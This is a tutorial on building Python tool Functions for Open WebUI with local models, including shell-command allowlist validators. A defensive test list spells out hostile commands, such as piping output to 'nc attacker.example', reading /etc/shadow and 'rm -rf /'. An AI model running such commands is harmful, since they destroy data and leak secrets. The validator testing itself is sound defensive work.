TL;DR
Open WebUI Functions transform your local LLM from a simple chat interface into a programmable AI platform with real-world capabilities. Functions are Python-based tools that execute during conversations, letting your models query databases, scrape websites, call external APIs, or interact with local services – all without sending data to cloud providers.
Think of Functions as middleware between your LLM and the outside world. When you ask your model to check current weather, fetch documentation, or query a PostgreSQL database, Functions handle the actual execution while the LLM orchestrates the logic. This architecture keeps your sensitive data local while extending AI capabilities beyond text generation.
The Functions system uses a straightforward Python structure with decorators and type hints. You write a function, define its parameters, and Open WebUI automatically generates the interface for your LLM to call it. The platform includes a built-in editor, testing console, and marketplace where community members share pre-built integrations for tools like Jira, GitHub, Home Assistant, and Elasticsearch.
Common use cases include web scraping with BeautifulSoup or Playwright, executing SQL queries against local databases, calling REST APIs for real-time data, reading local file systems, and triggering automation workflows. Functions can also validate LLM outputs before execution – critical when models generate shell commands or database queries.
Caution: Always validate AI-generated commands before production use. Functions execute with the permissions of your Open WebUI container, so a poorly designed function or malicious prompt could access sensitive files or make destructive API calls. Use read-only database connections where possible, implement rate limiting for external APIs, and test thoroughly in isolated environments.
This guide covers function development from scratch, debugging techniques, security considerations, and practical examples that work with Ollama-hosted models like llama3.2, mistral, and codellama running on your local infrastructure.
Understanding Open WebUI Functions Architecture
Open WebUI Functions operate as Python-based extensions that execute within the Open WebUI container environment. Unlike traditional chatbot interfaces that simply relay prompts to language models, Functions transform Open WebUI into a programmable platform where LLMs can trigger real code execution, query databases, call external APIs, and manipulate data structures.
When you enable a Function in Open WebUI, it registers as an available tool that the LLM can invoke during conversations. The execution flow works like this: your prompt reaches the language model, which decides whether to call a Function based on its description and parameters. If triggered, Open WebUI executes the Python code inside the container, captures the output, and feeds it back to the LLM for interpretation and response generation.
This architecture enables practical integrations like querying PostgreSQL databases for customer records, scraping current weather data from APIs, or executing system commands to check server status. For example, a Function might use the requests library to fetch real-time cryptocurrency prices from CoinGecko’s API, parse the JSON response, and return formatted data that the LLM incorporates into its answer.
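As a sketch of that CoinGecko example, a Function could look like the following. The endpoint shown (`/api/v3/simple/price`) reflects CoinGecko's public API at the time of writing; verify the current path before relying on it, and note that `format_price` is an illustrative helper, not an Open WebUI requirement:

```python
import requests


class Tools:
    def get_crypto_price(self, coin_id: str) -> str:
        """
        Fetch the current USD price of a cryptocurrency.
        :param coin_id: CoinGecko coin identifier, e.g. "bitcoin"
        :return: Formatted price string
        """
        url = "https://api.coingecko.com/api/v3/simple/price"
        try:
            resp = requests.get(
                url,
                params={"ids": coin_id, "vs_currencies": "usd"},
                timeout=10,
            )
            resp.raise_for_status()
        except requests.RequestException as e:
            return f"Price lookup failed: {e}"
        return self.format_price(coin_id, resp.json())

    def format_price(self, coin_id: str, data: dict) -> str:
        """Turn the API's JSON payload into a short sentence for the LLM."""
        price = data.get(coin_id, {}).get("usd")
        if price is None:
            return f"No USD price found for '{coin_id}'"
        return f"Current {coin_id} price: ${price:,.2f} USD"
```

Keeping the parsing step in its own method makes the Function easy to test without network access.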
Security Considerations
Functions execute with the same permissions as the Open WebUI container. This means they can access mounted volumes, network resources, and any credentials stored in environment variables. Before deploying Functions in production environments, carefully audit the code for command injection vulnerabilities, especially when Functions accept user input that gets passed to shell commands or database queries.
Caution: Always validate AI-generated Function code before enabling it. LLMs can hallucinate package names, use deprecated APIs, or generate code with security flaws. Test Functions in isolated development environments first, verify all external dependencies exist, and review network calls to ensure they target legitimate endpoints.
Creating Your First Custom Function
Open WebUI Functions are Python-based tools that execute within your self-hosted environment, allowing LLMs to interact with external systems. The simplest way to start is creating a function that fetches real-time data your model cannot access through training alone.
Navigate to Settings > Functions in your Open WebUI instance and click “Create New Function”. Every function requires three core components: metadata, input validation, and execution logic.
"""
title: Weather Data Fetcher
author: your-name
version: 0.1.0
"""
class Tools:
def __init__(self):
self.citation = True
def get_weather(self, city: str) -> str:
"""
Fetch current weather for a city
:param city: City name
:return: Weather information
"""
import requests
# Using wttr.in free weather API
url = f"https://wttr.in/{city}?format=3"
response = requests.get(url)
if response.status_code == 200:
return response.text
return f"Could not fetch weather for {city}"
This function enables your local LLM to answer “What’s the weather in Denver?” by making an actual API call. The model recognizes the function signature and calls it automatically when appropriate.
Testing and Validation
After saving, test the function in a new chat. Ask your model a weather question and observe the function execution in the response metadata. Open WebUI displays function calls with their parameters and return values.
Critical security note: Functions execute with the permissions of your Open WebUI container. Never allow LLMs to generate shell commands or SQL queries that run unvalidated. Always sanitize inputs and use parameterized queries for database operations. Consider running Open WebUI in a restricted Docker network that limits outbound connections to only necessary services.
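Parameterized queries keep user- or model-supplied values out of the SQL string entirely. A minimal sketch with Python's built-in sqlite3 driver (the `customers` table and its columns are illustrative):

```python
import sqlite3


def find_customer(conn: sqlite3.Connection, name: str) -> list:
    """Look up customers by name using a bound parameter.

    The driver passes `name` as data, never as SQL text, so input like
    "x'; DROP TABLE customers; --" cannot alter the query structure.
    """
    cur = conn.execute(
        "SELECT id, name FROM customers WHERE name = ?",  # ? is a placeholder
        (name,),
    )
    return cur.fetchall()
```

The same placeholder pattern applies to PostgreSQL via psycopg2, which uses `%s` markers instead of `?`.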
For production deployments, wrap external API calls in try-except blocks and implement rate limiting to prevent abuse if your instance serves multiple users.
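One simple rate-limiting approach is a sliding-window counter kept on the Tools instance; a sketch (the 10-calls-per-60-seconds budget is an arbitrary example, not an Open WebUI default):

```python
import time
from collections import deque


class RateLimiter:
    """Allow at most `max_calls` within a sliding `window` of seconds."""

    def __init__(self, max_calls: int = 10, window: float = 60.0):
        self.max_calls = max_calls
        self.window = window
        self.calls = deque()  # timestamps of recent calls

    def allow(self) -> bool:
        now = time.monotonic()
        # Drop timestamps that have aged out of the window
        while self.calls and now - self.calls[0] > self.window:
            self.calls.popleft()
        if len(self.calls) >= self.max_calls:
            return False
        self.calls.append(now)
        return True
```

A function would check `limiter.allow()` before each outbound request and return a polite refusal to the LLM when the budget is exhausted.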
Advanced Function Development Patterns
Functions can maintain state between invocations using class-based implementations. This pattern enables multi-step workflows where the LLM builds context across multiple interactions.
```python
import time


class DatabaseQueryFunction:
    def __init__(self):
        self.connection_pool = {}
        self.query_history = []

    def __call__(self, connection_string: str, query: str,
                 __user__: dict = {}) -> str:
        user_id = __user__.get("id", "anonymous")
        if user_id not in self.connection_pool:
            self.connection_pool[user_id] = self.create_connection(
                connection_string
            )
        self.query_history.append({
            "user": user_id,
            "query": query,
            "timestamp": time.time()
        })
        # create_connection() and execute_query() are helper methods
        # defined elsewhere in the class
        return self.execute_query(
            self.connection_pool[user_id],
            query
        )
```
This approach isolates user sessions while reusing database connections efficiently. The __user__ parameter carries authentication context that Open WebUI injects automatically.
Error Handling and Validation Layers
Production functions require robust validation before executing AI-generated commands. Implement allowlists for dangerous operations:
```python
import subprocess


def safe_shell_executor(command: str) -> str:
    allowed_commands = ["ls", "cat", "grep", "find"]
    parts = command.split()
    if not parts:
        return "Empty command"
    base_command = parts[0]
    if base_command not in allowed_commands:
        return f"Command '{base_command}' not permitted"
    if any(char in command for char in [";", "|", "&", "`"]):
        return "Command chaining not allowed"
    try:
        result = subprocess.run(
            parts,
            capture_output=True,
            text=True,
            timeout=5
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        return "Command execution timeout"
```
Caution: Never execute AI-generated shell commands without validation. LLMs can hallucinate dangerous operations or be manipulated through prompt injection. Always implement timeouts, resource limits, and command allowlists before deploying functions that interact with system resources or external services.
Async Operations for External APIs
For functions calling external services, use async patterns to prevent blocking Open WebUI:
```python
import asyncio
import aiohttp


async def fetch_api_data(endpoint: str, api_key: str) -> str:
    async with aiohttp.ClientSession() as session:
        headers = {"Authorization": f"Bearer {api_key}"}
        async with session.get(endpoint, headers=headers) as response:
            return await response.text()
```
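A timeout guard keeps a slow endpoint from stalling the event loop; a sketch using asyncio.wait_for (the coroutine passed in is a placeholder for any awaitable API call, such as an aiohttp fetch):

```python
import asyncio


async def fetch_with_timeout(coro, seconds: float = 10.0) -> str:
    """Await an API call, but give up after `seconds` instead of blocking."""
    try:
        return await asyncio.wait_for(coro, timeout=seconds)
    except asyncio.TimeoutError:
        return "External API did not respond in time"
```

Inside an async tool method you would write something like `await fetch_with_timeout(fetch_api_data(endpoint, key))`, so a dead endpoint produces a readable message for the LLM rather than a hung request.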
Installing and Using Marketplace Functions
Open WebUI includes a community-driven marketplace where developers share pre-built functions you can install directly into your instance. These functions extend your local LLMs with capabilities like web search, code execution, and API integrations without writing code from scratch.
Navigate to the Admin Panel in your Open WebUI instance, then select Functions from the sidebar. Click the marketplace icon to browse available functions. The marketplace displays functions with descriptions, author information, and installation counts. Popular functions include web scrapers, calculator tools, and database query interfaces.
Installing a Function
To install a marketplace function, click the function card and review its code in the preview window. Always examine the Python code before installation – marketplace functions execute on your server with the same permissions as Open WebUI. Look for suspicious network calls, file system operations, or credential handling.
Click Install to add the function to your workspace. Enable it by toggling the activation switch, then assign it to specific models or make it globally available.
Testing Installed Functions
After installation, start a new chat and reference the function by name. For example, if you installed a web search function called “search_web”, prompt your model with:
Search the web for recent developments in llama.cpp optimization
The LLM will recognize the available function and invoke it automatically, returning results within the chat context.
Security Considerations
Marketplace functions run arbitrary Python code on your host system. Treat them like any third-party software – review the source, check for hardcoded credentials, and test in isolated environments first. Functions that make external API calls may leak conversation context to third-party services. For production deployments, fork marketplace functions to your own repository and audit changes before updating.
Debugging and Testing Functions Locally
Testing functions before deploying them to your Open WebUI instance prevents runtime errors and unexpected behavior during live conversations. The development workflow differs from typical Python debugging because functions execute inside Open WebUI's container environment rather than your local shell.
Create a standalone test script that mimics Open WebUI’s function execution context. This approach catches errors before deployment:
```python
# test_function.py
import json

import requests


def scrape_documentation(url: str) -> dict:
    """Your actual function code"""
    response = requests.get(url, timeout=10)
    return {"content": response.text[:500], "status": response.status_code}


# Test execution
if __name__ == "__main__":
    result = scrape_documentation("https://docs.python.org")
    print(json.dumps(result, indent=2))
```
Run tests outside Docker to verify logic, then deploy to Open WebUI running on port 3000 (mapped from container port 8080).
Debugging Within Open WebUI
Enable verbose logging by checking function execution results in the chat interface. Open WebUI displays function return values directly in conversations, making it easy to spot malformed responses.
Add explicit error handling and logging to your functions:
```python
import logging

logger = logging.getLogger(__name__)


def query_database(query: str) -> dict:
    try:
        results = run_query(query)  # your database logic here
        return {"success": True, "rows": results}
    except Exception as e:
        logger.exception("Query failed: %s", query)
        return {"success": False, "error": str(e), "query": query}
```
Validation for AI-Generated Commands
CAUTION: Never execute shell commands or database queries generated by LLMs without validation. Functions that accept AI-generated input should implement strict allowlists:
```python
ALLOWED_COMMANDS = ["ls", "pwd", "date"]


def safe_shell(command: str) -> dict:
    parts = command.split()
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        return {"error": "Command not allowed"}
    # Execute only after validation
```
Test functions with malicious inputs during development. Assume the LLM will eventually generate unexpected parameters, especially when processing user requests that involve system operations or external API calls.
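A handful of adversarial cases can live right next to the validator during development; a sketch (the validator mirrors the allowlist pattern described above, not any Open WebUI internals):

```python
ALLOWED_COMMANDS = ["ls", "pwd", "date"]


def validate_command(command: str) -> bool:
    """Reject anything outside the allowlist or containing shell metacharacters."""
    parts = command.split()
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        return False
    return not any(ch in command for ch in ";|&`$(){}")


# Inputs an LLM might plausibly produce under prompt injection
malicious = [
    "rm -rf /",
    "ls; rm -rf /",
    "ls | nc attacker.example 4444",
    "pwd && cat /etc/shadow",
    "date `whoami`",
    "",
]
assert all(not validate_command(c) for c in malicious)
assert validate_command("ls -la")
```

Running these assertions on every change catches regressions in the validator before a model ever sees it.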
Installation and Configuration Steps
Before developing Functions, ensure Open WebUI is running with proper Python environment support. The standard Docker deployment includes Python 3.11 and pip, but Functions require additional configuration for external dependencies.
Start Open WebUI with volume mounts for persistent function storage:
```shell
docker run -d -p 3000:8080 \
  -v open-webui:/app/backend/data \
  --name open-webui \
  ghcr.io/open-webui/open-webui:main
```
Access the interface at http://localhost:3000 and navigate to Admin Panel > Settings > Functions. Enable the Functions feature toggle – this activates the Python execution environment within the container.
Installing Function Dependencies
Functions run inside the Open WebUI container, so any packages they import must be available there. Install packages through the Functions interface or by accessing the container shell:
```shell
docker exec -it open-webui pip install requests beautifulsoup4 psycopg2-binary
```
Common dependencies for integration work include requests for API calls, beautifulsoup4 for web scraping, and database drivers like psycopg2-binary for PostgreSQL connections. Install only what your Functions require to minimize attack surface.
Creating Your First Function
Navigate to Workspace > Functions > Create New Function. The editor provides a Python template with required structure:
```python
class Tools:
    def __init__(self):
        pass

    def get_weather(self, city: str) -> str:
        """Fetch current weather for a city"""
        # Function implementation
        pass
```
Functions must define a Tools class with methods that accept typed parameters and return strings or structured data. The LLM automatically detects available functions through docstrings and type hints.
Caution: Functions execute with container privileges. Validate all user inputs and sanitize data before making external API calls or database queries. Never execute AI-generated shell commands without manual review, especially when Functions interact with production systems or sensitive data sources.
